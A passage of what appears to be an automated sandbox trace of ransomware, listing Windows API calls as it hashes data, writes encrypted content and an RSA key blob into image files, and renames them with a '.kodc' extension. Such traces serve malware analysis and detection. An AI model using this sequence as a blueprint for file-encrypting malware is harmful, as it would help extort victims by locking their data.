KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.719] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.720] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.720] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.720] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.720] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.720] GetLastError () returned 0x0 [0099.720] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.720] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.720] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.720] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.720] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x13650) returned 0x9bb8968 [0099.722] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bde8 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9be30 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.722] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7998 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb79b0 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.724] GetCurrentThreadId () returned 0x42c [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5b28 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.724] GetCurrentThreadId () returned 0x42c [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79f8 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79f8 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0099.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9be30 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.729] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x13645, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x13645, lpOverlapped=0x0) returned 1 [0099.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0099.729] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1364a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.730] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.730] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.730] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.730] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.730] CloseHandle (hObject=0x5cc) returned 1 [0099.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.732] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qxpM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qxpm.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qxpM.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qxpm.bmp.kodc")) returned 1 [0099.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.732] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.734] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3400830, ftCreationTime.dwHighDateTime=0x1d5bd9f, ftLastAccessTime.dwLowDateTime=0x491a86d0, ftLastAccessTime.dwHighDateTime=0x1d5bae5, ftLastWriteTime.dwLowDateTime=0x491a86d0, ftLastWriteTime.dwHighDateTime=0x1d5bae5, nFileSizeHigh=0x0, nFileSizeLow=0x5320, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r5xI0I6PQENX7m.gif", cAlternateFileName="R5XI0I~1.GIF")) returned 1 [0099.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.734] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\r5xI0I6PQENX7m.gif") returned=".gif" [0099.734] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\r5xI0I6PQENX7m.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\r5xi0i6pqenx7m.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.734] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=21280) returned 1 [0099.734] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.737] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x52fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.737] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.738] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.738] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x5320, lpOverlapped=0x0) returned 1 [0099.738] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END 